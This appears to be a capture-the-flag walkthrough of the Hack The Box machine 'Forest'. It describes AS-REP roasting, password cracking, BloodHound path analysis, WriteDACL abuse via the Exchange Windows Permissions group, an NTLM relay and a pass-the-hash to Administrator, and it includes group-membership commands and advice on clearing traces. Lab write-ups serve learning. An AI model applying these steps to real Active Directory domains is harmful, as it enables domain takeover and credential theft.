Forest — HTB walkthrough

As the name goes you will come across dense Active Directory nodes. Considering tree structure of LDAP directories, it is named Forest. As far as I guess ; well !!

ENUMERATION

Nmap Scan

we get domain name Forest.htb.local, add this to /etc/hosts

RPC ENUMERATION

Make user list using above lists

SMB ENUMERATION

anonymous Login successful but no share visible

KERBEROS 88

With the user list we created above, we will try AS_REP ROAST

Gave us the hash

hash for svc-alfresco

CRACKING HASH

using john and rockyou.txt we crack hash

User =svc-alfresco : Password = s3rvice

CRACKMAPEXEC verification

Using crackmapexec to see if it works with smb and winrm

Doesn’t work for SMB

But worked for winrm

EXPLOITATION

Getting user.txt

PRIVILEGE ESCALATION

After enumerating and playing around . I found I couldn’t execute any script. So we will do AD Enumeration

For this first download SharpHound on your kali linux and then transfer it to windows.

Refer: https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html

downloading on attacker machine

We can see a zip file, created after a minute or two.

Downloading this zip file to our machine, which we will analyse using bloodhound. You can use direct evil-winrm Utility to download the file

Or trivial way, I used smbserver.py

On attacker machine keep smbserver on

On target machine

Note here you need to del Zip file and remove share : Clearing the traces.

To analyze contents of ZIP, download BloodHound on your machine

Run: neo4j console — ->bloodhound . A message will appear

Traversing on browser http://127.0.0.1:7474/ , we get user prompt. Login using default password : neo4j . Then change the password

Now run Bloodhound

And login with new password

On the blank screen that appears after login, drag n drop your zip file

File gets processed in background. Then run few queries as shown

And you will see a graph gets created as soon as you run queries

You can see the path from svc-alfresco to Domain Admins, which goes through exploiting writeDACL

Right click on WriteDacl Help which will show you what exploit does and how to do that

Steps to exploit WriteDACL priv

So we have priv to add user to DACL with EXCHANGE WINDOWS PERMISSIONS. So we will either create a new user or svc-alfresco can be taken as user.

1) net group “Exchange Windows Permissions” n00bDi /add

Or You could follow below steps

2.1) $pass = ConvertTo-SecureString “password12” -AsPlainText -Force

2.2) New-ADUser n00bDi -AccountPassword $pass -Enabled $True

Also we can observe that the above mentioned command(2.2) gives already present account, if we have used step (1) instead of 2. Then finally we give EXCHANGE WINDOWS PERMISSION to user n00bDi

3) Add-ADGroupMember -Identity “Exchange Windows Permissions” -members n00bDi

4)Running query to list users in group “Exchange Windows Permissions” we see we have n00bDi

Now we will run ntlmrelayx.py to relay priv

NTLMRELAYX.PY : This script performs NTLM Relay Attacks, setting an SMB and HTTP Server and relaying credentials to many different protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc.). The script can be used with predefined attacks that can be triggered when a connection is relayed (e.g. create a user through LDAP) or can be executed in SOCKS mode. In this mode, for every connection relayed, it will be available to be used later on multiple times through a SOCKS proxy. Acts as MITM

On browser: Go to 127.0.0.1 and login using n00bDi:password12

We get success on ntlmreplax.py

Now we will use secretsdump.py to collect hashes

Got LM:NTLM Hash for Administrator

Passing the Hash using evil-winrm

ROOTED!!!